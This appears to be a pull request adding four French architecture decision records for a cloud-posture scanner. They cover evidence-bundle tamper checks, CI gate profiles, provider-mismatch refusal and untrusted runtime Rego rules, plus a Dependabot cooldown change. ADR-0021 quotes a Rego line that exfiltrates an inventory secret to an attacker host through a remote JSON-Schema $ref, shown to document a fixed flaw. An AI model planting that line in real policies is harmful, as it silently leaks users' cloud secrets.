### PR TITLE
docs(adr): record the four decisions this wave took, while the reasoning is exact

### DIFF
--- a/.github/dependabot.yml
+++ b/.github/dependabot.yml
@@ -4,8 +4,17 @@ updates:
     directory: "/"
     schedule:
       interval: weekly
+    # La carence laisse le temps qu'une version fraiche montre ses defauts. Appliquee
+    # UNIFORMEMENT, elle retarde aussi les correctifs de securite : celui de
+    # scankit v0.2.3 fermait une exfiltration silencieuse et a attendu, faute d'avis
+    # CVE qui l'aurait distingue d'une montee ordinaire (ADR-0021).
+    #
+    # La carence des versions de CORRECTIF est donc courte : c'est la que les
+    # correctifs de securite arrivent, et c'est aussi la montee dont la regression
+    # coute le moins cher a annuler.
     cooldown:
       default-days: 7
+      semver-patch-days: 1
     open-pull-requests-limit: 10
     groups:
       go-dependencies:

--- a/docs/adr/0018-ce-quun-bundle-prouve-de-lui-meme.md
+++ b/docs/adr/0018-ce-quun-bundle-prouve-de-lui-meme.md
@@ -1,0 +1,106 @@
+# ADR-0018 — Un bundle recoupe ce qu'il porte ; seule la signature ferme la chaîne
+
+```yaml
+status: Accepted
+date: 2026-09-09
+scope:
+  - security
+  - persistence
+  - output
+```
+
+## Contexte
+
+Le bundle de preuve est la promesse centrale du produit : un dossier qu'un tiers
+rouvre et oppose. `verify` déclarait « cohérent en interne » un bundle qui se
+contredisait lui-même.
+
+Mesuré : réécrire quatre résultats `fail` en `pass`, puis recalculer l'empreinte du
+seul fichier touché, produisait un dossier accepté avec le code 0 — pendant que son
+propre `manifest.json` annonçait encore `"fail": 4`.
+
+```
+manifest.json dit   {"fail": 4, "not-applicable": 2, "not-evaluated": 14, "pass": 7}
+assessment.json a   {           "not-applicable": 2, "not-evaluated": 14, "pass": 11}
+```
+
+L'information qui contredisait le dossier était **dans le dossier**, et rien ne la
+regardait.
+
+## Décision
+
+Un bundle **recoupe tout ce qu'il porte en double**, et le refus est un échec dur :
+
+- le résumé du manifeste est confronté aux statuts réellement présents dans
+  `assessment.json` ;
+- la **taille** déclarée de chaque artefact est vérifiée à côté de son empreinte ;
+- `checksums.txt` est lu **strictement** : une ligne illisible ou dupliquée est un
+  refus.
+
+Et la frontière, qui compte autant que les vérifications : **aucune donnée interne au
+bundle ne peut ancrer `checksums.txt`.** Seule la signature détachée ferme la chaîne.
+`verify` ne prétend donc pas à davantage que ce qu'il peut établir, et
+`--require-signature` permet à un appelant d'exiger la propriété forte.
+
+## Justification
+
+Ces recoupements ne coûtent rien — un parcours des résultats, une taille de fichier,
+une lecture stricte — et attrapent l'altération **la plus tentante de toutes** : celle
+qui change le verdict. Ne pas les faire revenait à ne pas regarder ce qu'on avait sous
+les yeux.
+
+La frontière doit être écrite parce qu'elle est **contre-intuitive**. Il paraît naturel
+de vouloir « fermer la chaîne » en enregistrant l'empreinte de `checksums.txt` quelque
+part dans le bundle. C'est impossible : qui réécrit un fichier réécrit aussi l'ancre.
+Un dispositif qui en donnerait l'apparence serait pire que son absence, parce qu'on
+cesserait de réclamer la signature.
+
+## Alternatives écartées
+
+**Enregistrer l'empreinte de `checksums.txt` dans `manifest.json`, et celle de
+`manifest.json` dans `checksums.txt`.** Rejeté : **circulaire**. Écrire l'un invalide
+l'empreinte que l'autre vient de prendre. Cette proposition reviendra, parce qu'elle
+paraît évidente — la raison du rejet est arithmétique, pas une préférence.
+
+**Un hachage racine stocké dans le bundle.** Rejeté pour la même raison, un cran plus
+haut : l'ancre est dans la zone que l'attaquant contrôle. Un ancrage n'a de valeur
+qu'HORS du bundle, ce qu'est exactement la signature détachée.
+
+**Faire échouer `verify` par défaut sur un bundle non signé.** Rejeté : cela ferait
+échouer, en silence, des chaînes qui passent aujourd'hui. Le drapeau est donc opt-in —
+même raisonnement qu'à l'ADR-0019 pour le profil de porte.
+
+**Se contenter d'avertir sur la contradiction.** Rejeté : l'avertissement était déjà
+sur stdout et le code de sortie disait « réussi ». L'automatisation lit le code.
+
+## Conséquences
+
+Un bundle produit par une version antérieure reste vérifiable : un manifeste sans
+résumé n'est pas recoupé, parce qu'on ne fabrique pas ce qu'il ne dit pas (ADR-0014).
+
+`verify` refuse désormais des dossiers qu'il acceptait. C'est le mode d'échec voulu :
+ceux qu'il refuse se contredisaient.
+
+Le message d'erreur nomme la contradiction — ce que le manifeste annonce, ce que
+l'assessment porte — plutôt que de dire « altéré ». Un dossier refusé sans motif ne
+permet pas de distinguer une corruption d'une falsification.
+
+## Invariants
+
+- Un bundle dont deux artefacts se contredisent est refusé.
+- `verify` sans signature n'affirme jamais plus que l'intégrité accidentelle.
+- Aucun mécanisme interne au bundle n'est présenté comme fermant la chaîne.
+
+*Gardes : `TestVerifyRefusesEveryTamperingPattern` (table par motif d'altération, qui
+commence par vérifier un bundle INTACT — sans quoi une correction refusant tout
+passerait), `TestRequireSignatureRefusesAnUnsignedBundle`.*
+
+## Validation
+
+Quatre motifs d'altération, chacun devant rendre non nul ; deux d'entre eux passaient
+avant cette décision.
+
+## Liens
+
+ADR-0005 (codes de sortie) · ADR-0014 (une donnée absente ne se fabrique pas) ·
+ADR-0016 (chaîne d'approvisionnement) · issue #156.

--- a/docs/adr/0019-un-profil-filtre-la-porte-jamais-le-rapport.md
+++ b/docs/adr/0019-un-profil-filtre-la-porte-jamais-le-rapport.md
@@ -1,0 +1,100 @@
+# ADR-0019 — Un profil filtre la porte, jamais le rapport
+
+```yaml
+status: Accepted
+date: 2026-09-09
+scope:
+  - output
+  - ci
+```
+
+## Contexte
+
+Un premier scan doit provoquer « ah oui, ça c'est intéressant », pas « oui, je sais que
+ma VM de test n'a pas de protection contre la suppression ».
+
+Une VM publique dont SSH est ouvert à Internet et un volume sans snapshot récente sont
+tous deux `high`. Le second est un faux positif **assumé** — la règle le documente
+elle-même, un volume peut être sauvegardé autrement — et lui donner le poids du premier
+fait douter du premier.
+
+Mais changer ce qu'une porte accepte est **la façon la plus discrète de casser une
+chaîne de CI** : une équipe qui échoue aujourd'hui passerait au vert après une mise à
+jour, sans que personne ne l'ait décidé.
+
+## Décision
+
+Un profil (`scan --gate`) filtre **ce qui pèse dans le code de sortie**. Il ne retire
+rien du rapport, dans aucun format — table, `json`, `sarif`, `assessment`, bundle
+scellé.
+
+Deux garanties, tenues par des gardes :
+
+1. **Le défaut ne change pas** (`all`). Sans le drapeau, rien ne bouge.
+2. **Aucun profil ne peut faire passer une chaîne de rouge à vert.** Un écart
+   `critical`/`high` mis de côté rend `3` — « le scan n'établit pas la conformité » —
+   jamais `0`. Un écart resté visible rend toujours `1`.
+
+Chaque scan **imprime ce qu'il a mis de côté**, par code de contrôle.
+
+## Justification
+
+Ce n'est pas une invention : c'est la règle que ce dépôt applique **déjà** aux
+dérogations et aux constats d'incertitude, écrite dans `cmd/scan.go` quelques lignes
+au-dessus du point d'insertion — *« le rapport dit tout, seule la porte tient compte des
+dérogations »*. Un profil est le troisième cas de la même doctrine.
+
+Un profil qui retirerait des écarts du rapport transformerait le silence en faux vert,
+et il le ferait depuis un **réglage** plutôt qu'un défaut de règle — donc invisible,
+donc pire. C'est très exactement ce que la vague 4 a passé trois lots à combattre.
+
+Le `3` n'est pas un choix par défaut : c'est la lecture honnête d'un scan
+**volontairement partiel**, et l'ADR-0005 lui réserve déjà cette place. Aucun cinquième
+code n'est requis.
+
+## Alternatives écartées
+
+**Changer le profil par défaut pour un profil peu bruyant.** Rejeté : une chaîne rouge
+passerait au vert sans décision. Si ce défaut devait un jour changer, il faudrait une
+version majeure et une ligne de CHANGELOG qui le dise en toutes lettres.
+
+**Filtrer le rapport en même temps que la porte.** Rejeté : un écart caché ne se
+retrouve pas. La demande d'un premier scan moins irritant est réelle, mais elle se
+traite par le REGROUPEMENT des findings (issue #117), pas par leur disparition.
+
+**Un cinquième code de sortie pour « partiel par profil ».** Rejeté par l'ADR-0005, dont
+l'argument tient ici : il ne pourrait jamais primer sur `1`, donc il ne s'exprimerait
+que là où `3` s'exprime déjà.
+
+**Filtrer sur la seule sévérité.** Rejeté : cela mélange encore « grave » et « certain »,
+qui est le défaut que la dimension de confiance existe pour corriger.
+
+## Conséquences
+
+Le drapeau ne s'appelle **pas** `--profile` : ce nom désigne déjà le profil
+d'identifiants de la collecte live. Il s'appelle `--gate`, ce qui dit d'ailleurs mieux
+ce qu'il fait.
+
+Un finding dont le label `category` ou `confidence` manque est **toujours retenu**. Le
+repli penche vers plus de sévérité : une règle qui oublierait son label ne doit pas
+sortir silencieusement de toutes les portes.
+
+## Invariants
+
+- Le rapport est complet quel que soit le profil.
+- Le profil par défaut ne filtre rien.
+- Un profil ne rend jamais `0` là où le profil `all` rendrait `1`.
+
+*Gardes : `TestNoGateProfileTurnsARedChainGreen` (mesurée sur le binaire, et éprouvée en
+neutralisant la porte), `TestTheDefaultProfileFiltersNothing`,
+`TestAnUnlabelledFindingIsAlwaysRetained`.*
+
+## Validation
+
+Matrice mesurée sur le binaire : inventaire non conforme → `1` ou `3` selon le profil,
+jamais `0` ; plan corrigé → `0` partout.
+
+## Liens
+
+ADR-0005 (codes de sortie) · ADR-0008 (une dérogation n'est pas une conformité) ·
+issues #111 (confiance), #112, #117 (regroupement).

--- a/docs/adr/0020-lorigine-declaree-dun-inventaire-fait-foi.md
+++ b/docs/adr/0020-lorigine-declaree-dun-inventaire-fait-foi.md
@@ -1,0 +1,97 @@
+# ADR-0020 — L'origine déclarée d'un inventaire fait foi : on refuse, on n'avertit pas
+
+```yaml
+status: Accepted
+date: 2026-09-09
+scope:
+  - model
+  - assessment
+```
+
+## Contexte
+
+Scanner un inventaire Scaleway avec le jeu de règles Exoscale était accepté **sans un
+mot**, et produisait un rapport plausible contenant six verdicts `pass`.
+
+```
+exoscale lisant l'inventaire scaleway :  6 fail   5 n/a   17 not-evaluated   6 pass
+scaleway lisant le même fichier       :  4 fail   2 n/a   14 not-evaluated   7 pass
+```
+
+Ces `pass` ne sont pas faux par accident : ils sont **vides de sens**. Les formes de
+ressources se recouvrent juste assez pour que des règles s'évaluent et concluent sur des
+données que ce jeu de règles n'a jamais eu à lire. Et la discordance ne change pas
+seulement la formulation — elle **déplace les verdicts, dans les deux sens**.
+
+Le mode d'échec est silencieux et réaliste : une faute de frappe dans un pipeline, un
+job copié-collé, et le rapport a l'air parfaitement normal — un mélange crédible de
+statuts et un code de sortie non nul qui suggère même que le scan a travaillé.
+
+L'information était **des deux côtés** et n'était simplement jamais confrontée.
+
+## Décision
+
+Un inventaire qui **déclare** un fournisseur différent de celui demandé est **refusé**,
+avec le code `2` — celui déjà employé pour un export illisible. La déclaration est lue à
+la racine de l'export **et** sur ses ressources.
+
+Un inventaire qui **ne déclare rien** n'est pas refusé.
+
+## Justification
+
+Un inventaire dont l'origine ne correspond pas au jeu de règles n'est pas un scan aux
+résultats surprenants : **c'est un scan qui n'aurait pas dû tourner.** Le code `2` dit
+exactement cela, et il est déjà celui d'une entrée que l'outil ne sait pas lire.
+
+Avertir ne suffit pas. Le contrat central du produit est qu'un `pass` n'est affirmé que
+si la donnée qui l'adosse a réellement été collectée ; ici, six contrôles affirmaient
+`pass` contre un inventaire que le jeu de règles n'était pas censé lire. Un avertissement
+laisse le rapport, le bundle et le code de sortie inchangés.
+
+Ne rien exiger d'un inventaire muet découle de l'ADR-0014 : une origine absente ne
+s'invente pas, et l'exiger casserait tout export écrit à la main.
+
+## Alternatives écartées
+
+**Avertir sans refuser.** Rejeté : l'avertissement serait sur stderr, le rapport
+resterait plausible, le bundle scellé enregistrerait une cible contredisant son propre
+inventaire, et le code de sortie ne bougerait pas.
+
+**Un drapeau de lecture croisée délibérée** (`--allow-cross-provider`), avec mention de
+la dérogation dans `run`. Rejeté : personne n'a produit de cas d'usage, et un drapeau
+qui autorise un rapport dénué de sens est un drapeau qu'on finit par poser dans un
+pipeline pour faire taire une erreur. Si un besoin réel apparaît, il exigera une
+nouvelle décision, pas un simple ajout.
+
+**Exiger que tout inventaire déclare son fournisseur.** Rejeté : ADR-0014, et ça
+casserait les exports écrits à la main sans rien prouver de plus.
+
+## Conséquences
+
+La garde est la **matrice croisée**, jamais un couple : chaque fixture lue par chaque
+autre fournisseur doit sortir en `2`, et lue par le sien doit scanner normalement.
+Vérifier un seul couple laisserait passer une correction qui refuse tout.
+
+Un `verify --re-derive` n'est pas affecté : l'`input.json` scellé porte le fournisseur
+du scan qui l'a produit.
+
+Cette décision a immédiatement révélé un défaut dans le harnais de mesure de ce dépôt —
+quatre tenants du corpus déclarent `outscale` et étaient scannés avec les règles
+`scaleway`. Une décision qui attrape un défaut chez celui qui l'écrit est une décision
+qui mesure quelque chose.
+
+## Invariants
+
+- Un inventaire qui déclare une origine autre que celle demandée n'est jamais évalué.
+- Un inventaire muet n'est jamais refusé pour son silence.
+
+*Garde : `TestAProviderMismatchIsRefused` (matrice croisée, diagonale comprise).*
+
+## Validation
+
+Neuf couples fournisseur × inventaire : six refus, trois scans normaux.
+
+## Liens
+
+ADR-0005 (codes de sortie) · ADR-0006 (jamais un `pass` non prouvé) · ADR-0014 · issue
+#148.

--- a/docs/adr/0021-une-regle-chargee-a-lexecution-est-du-code-non-fiable.md
+++ b/docs/adr/0021-une-regle-chargee-a-lexecution-est-du-code-non-fiable.md
@@ -1,0 +1,100 @@
+# ADR-0021 — Une règle chargée à l'exécution est du code non fiable, et son refus réseau se mesure
+
+```yaml
+status: Accepted
+date: 2026-09-09
+scope:
+  - security
+  - engine
+```
+
+## Contexte
+
+`--policy-dir` charge des règles Rego **à chaud**, sans recompilation. Ce sont des
+tiers, et elles s'évaluent sur un inventaire qui contient tout ce que le scan a
+collecté : user-data, politiques IAM, configurations complètes d'un tenant.
+
+Le moteur retirait `http.send`, `net.lookup_ip_addr` et `opa.runtime` de son jeu de
+capacités, et l'annonçait comme un refus réseau. **C'était faux.** OPA résout le `$ref`
+distant d'un JSON-Schema par HTTP **au moment de l'évaluation**, sur un chemin
+qu'aucun builtin ne garde :
+
+```rego
+json.match_schema(input, {"$ref": sprintf("%s/leak/%s", [attaquant, input.secret])})
+```
+
+Mesuré avec un serveur témoin contre la version alors épinglée : la requête partait,
+l'inventaire sortait, et `Evaluate` ne rendait **aucune erreur**. Le silence est la
+partie qui compte — rien, chez un consommateur, dans un log de CI ou dans un code de
+sortie, n'aurait paru anormal.
+
+Cet ADR est distinct de l'ADR-0016, et la distinction est le sujet : celui-ci porte sur
+ce que Pépin **publie**, celui-là sur ce que Pépin **exécute**. Le modèle de menace y
+est inversé.
+
+## Décision
+
+Une règle chargée à l'exécution est traitée comme du **code non fiable**.
+
+Le refus réseau ne se déduit pas d'un jeu de capacités : il se **mesure**, avec un
+serveur témoin, à chaque build. Et l'**épinglage** de `scankit` est une frontière de
+sécurité, pas une simple dépendance : une remontée de version en arrière rouvre la
+brèche.
+
+## Justification
+
+Lire une liste de capacités ne prouve rien. C'est précisément ce qui a échoué : la liste
+était juste, le refus qu'elle était censée produire ne l'était pas, et le chemin qui
+restait ouvert ne passait par aucun builtin. Un témoin qui reste muet prouve quelque
+chose ; une lecture de source prouve qu'on a lu.
+
+L'épinglage mérite d'être nommé comme frontière parce que sa régression est
+**silencieuse** : rien d'autre ne rougirait. Une garde adossée à un témoin le voit, une
+revue de `go.mod` non.
+
+## Alternatives écartées
+
+**Se fier au jeu de capacités comme documentation du refus.** Rejeté : c'est exactement
+ce qui a produit l'incident. Un refus annoncé et non éprouvé est un refus supposé.
+
+**Isoler l'évaluation entière (bac à sable, espace de noms réseau).** Rejeté pour
+l'instant : coût d'exploitation élevé, portabilité incertaine, et le refus au niveau du
+chargeur de schémas couvre le chemin réel. À rouvrir si un second chemin apparaît —
+auquel cas la question ne sera plus « faut-il un bac à sable » mais « lequel ».
+
+**Autoriser une liste d'hôtes.** Rejeté : aucune règle de posture n'a de raison
+légitime d'atteindre le réseau, et une liste devient une porte qu'on élargit.
+
+**Interdire `--policy-dir`.** Rejeté : les règles externes sont une fonctionnalité
+assumée. Le problème n'est pas qu'elles existent, c'est qu'on les croyait inoffensives.
+
+## Conséquences
+
+Une garde tend un témoin plutôt que de lire le code, et elle est éprouvée **dans les
+deux sens** : verte sur la version corrigée, elle rapporte la requête reçue quand le
+module est ramené à la version vulnérable.
+
+**Une carence de mise à jour uniforme retarde aussi les correctifs de sécurité.** Le
+correctif existait en amont depuis cinq jours ; Dependabot fonctionnait, et sa carence
+de sept jours le retenait, aucun avis CVE ne le distinguant d'une montée ordinaire. La
+carence des versions de **correctif** est donc raccourcie : c'est là que les correctifs
+de sécurité arrivent, et une version de correctif est aussi celle dont la régression
+coûte le moins cher à annuler.
+
+## Invariants
+
+- Aucune règle chargée à l'exécution n'atteint le réseau.
+- Le refus réseau est mesuré par un témoin, jamais déduit d'une liste de capacités.
+- Une régression de l'épinglage de `scankit` fait rougir une garde.
+
+*Garde : `TestNoThirdPartyPolicyCanReachTheNetwork`.*
+
+## Validation
+
+Serveur témoin, même règle hostile, deux versions du moteur : requête reçue sur l'une,
+aucune sur l'autre.
+
+## Liens
+
+ADR-0002 (moteur partagé `scankit`) · ADR-0016 (chaîne d'approvisionnement publiée) ·
+issues #146, #147.

--- a/docs/adr/README.md
+++ b/docs/adr/README.md
@@ -88,13 +88,14 @@ Avant d'implémenter, établir si A, B et C ont cessé d'être vraies.
 |---|---|
 | Architecture des règles, providers | [0001](0001-regles-communes-providers-collecteurs.md) |
 | Moteur, findings, rendu, scoring | [0002](0002-moteur-partage-scankit.md) |
-| Modèle de données, inventaire | [0003](0003-inventaire-contrat-gele.md), [0007](0007-provenance-index-parallele.md), [0017](0017-provenance-atteste-une-recherche.md) |
+| Modèle de données, inventaire | [0003](0003-inventaire-contrat-gele.md), [0007](0007-provenance-index-parallele.md), [0017](0017-provenance-atteste-une-recherche.md), [0020](0020-lorigine-declaree-dun-inventaire-fait-foi.md) |
 | Référentiel, frameworks normatifs | [0004](0004-index-scsl-gele.md), [0009](0009-configuration-lie-mapping.md) |
-| Codes de sortie, portes de CI | [0005](0005-codes-de-sortie.md), [0008](0008-derogation-nest-pas-conformite.md) |
-| Assessment, verdicts, dégradation | [0006](0006-jamais-un-pass-non-prouve.md), [0014](0014-jamais-fabriquer-une-donnee-absente.md), [0015](0015-une-regle-qui-ne-peut-conclure-le-dit.md), [0017](0017-provenance-atteste-une-recherche.md) |
+| Codes de sortie, portes de CI | [0005](0005-codes-de-sortie.md), [0008](0008-derogation-nest-pas-conformite.md), [0019](0019-un-profil-filtre-la-porte-jamais-le-rapport.md) |
+| Assessment, verdicts, dégradation | [0006](0006-jamais-un-pass-non-prouve.md), [0014](0014-jamais-fabriquer-une-donnee-absente.md), [0015](0015-une-regle-qui-ne-peut-conclure-le-dit.md), [0017](0017-provenance-atteste-une-recherche.md), [0020](0020-lorigine-declaree-dun-inventaire-fait-foi.md) |
 | Tests, preuve, véracité | [0010](0010-dette-de-veracite-comptee.md) |
+| Bundle de preuve, persistance | [0018](0018-ce-quun-bundle-prouve-de-lui-meme.md) |
 | Langue, documentation | [0011](0011-bilinguisme-francais-normatif.md) |
-| Sécurité de la mesure, identifiants | [0012](0012-aucun-identifiant-en-ci.md), [0016](0016-chaine-dapprovisionnement-verifiable.md) |
+| Sécurité de la mesure, identifiants | [0012](0012-aucun-identifiant-en-ci.md), [0016](0016-chaine-dapprovisionnement-verifiable.md), [0021](0021-une-regle-chargee-a-lexecution-est-du-code-non-fiable.md) |
 | Compatibilité des consommateurs | [0013](0013-un-code-de-controle-ne-se-renomme-pas.md) |
 
 Chaque ADR porte aussi un `scope:` en tête, pour que cette identification soit


### PR DESCRIPTION
Quatre décisions d'architecture ont été prises coup sur coup dans cette vague, et
aucune n'était écrite. Un ADR reconstruit six mois plus tard depuis le code n'est plus
une décision, c'est une déduction : **les alternatives sérieusement envisagées puis
écartées ne laissent aucune trace dans le code qui leur a survécu.**

## Les quatre

**ADR-0018 — Un bundle recoupe ce qu'il porte ; seule la signature ferme la chaîne.**
La seconde moitié compte plus que la première. Il paraît naturel de vouloir « fermer la
chaîne » en enregistrant l'empreinte de `checksums.txt` quelque part dans le bundle :
c'est **arithmétiquement impossible**, puisque qui réécrit un fichier réécrit aussi
l'ancre. La proposition reviendra précisément parce qu'elle paraît évidente — la raison
du rejet est donc écrite plutôt que laissée à redécouvrir.

**ADR-0019 — Un profil filtre la porte, jamais le rapport.** Pas une invention : c'est
la règle que ce dépôt applique déjà aux dérogations et aux constats d'incertitude, et un
profil en est le troisième cas. La pression sera constante dans l'autre sens
(« masquons les findings bruyants »), et l'alternative écartée — changer le défaut — est
exactement le faux vert que trois lots ont combattu.

**ADR-0020 — L'origine déclarée fait foi : on refuse, on n'avertit pas.** L'issue
proposait elle-même un drapeau de lecture croisée. Écarté : personne n'a produit de cas
d'usage, et un drapeau qui autorise un rapport dénué de sens finit posé dans un pipeline
pour faire taire une erreur.

**ADR-0021 — Une règle chargée à l'exécution est du code non fiable, et son refus réseau
se MESURE.** Délibérément distinct d'ADR-0016, et la distinction est le sujet : celui-là
porte sur ce que Pépin **publie**, celui-ci sur ce que Pépin **exécute**, modèle de
menace inversé. Lire une liste de capacités ne prouve rien — c'est exactement ce qui a
échoué, la liste étant juste et le refus qu'elle devait produire ne l'étant pas.

## Une conséquence appliquée, pas laissée en intention

ADR-0021 constate qu'une **carence uniforme retarde aussi les correctifs de sécurité**.
C'est ce qui a retenu scankit v0.2.3 pendant cinq jours pendant qu'elle fermait une
exfiltration silencieuse, faute d'avis CVE qui l'aurait distinguée d'une montée
ordinaire.

```yaml
cooldown:
  default-days: 7
  semver-patch-days: 1
```

C'est là que les correctifs de sécurité arrivent, et c'est aussi la montée dont la
régression coûte le moins cher à annuler.

## Ce qui n'a PAS d'ADR

#153, #146, #149, #150, #151 : des corrections de défaut sans décision à consigner.
L'enseignement du correctif de sous-commande — `Args` sur une commande non exécutable ne
s'applique jamais — est un **commentaire**, et il y est. Le registre met lui-même en
garde contre l'ADR qui explique du code.

#115 et #118 non plus : elles **appliquent** la doctrine d'ADR-0010 (une dette comptée
plutôt qu'une matrice verte) au lieu de la changer.

## La table de portée

Elle couvre de nouveau les 21 ADR, et gagne une ligne : **le bundle de preuve n'avait
pas de domaine à lui**. C'est le mécanisme sur lequel s'appuie l'étape 2 du contrat de
revue — un ADR absent de cette table est un ADR que personne ne trouvera.

`mise run adr-drift` : 21 ADR contrôlés, rien à signaler.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
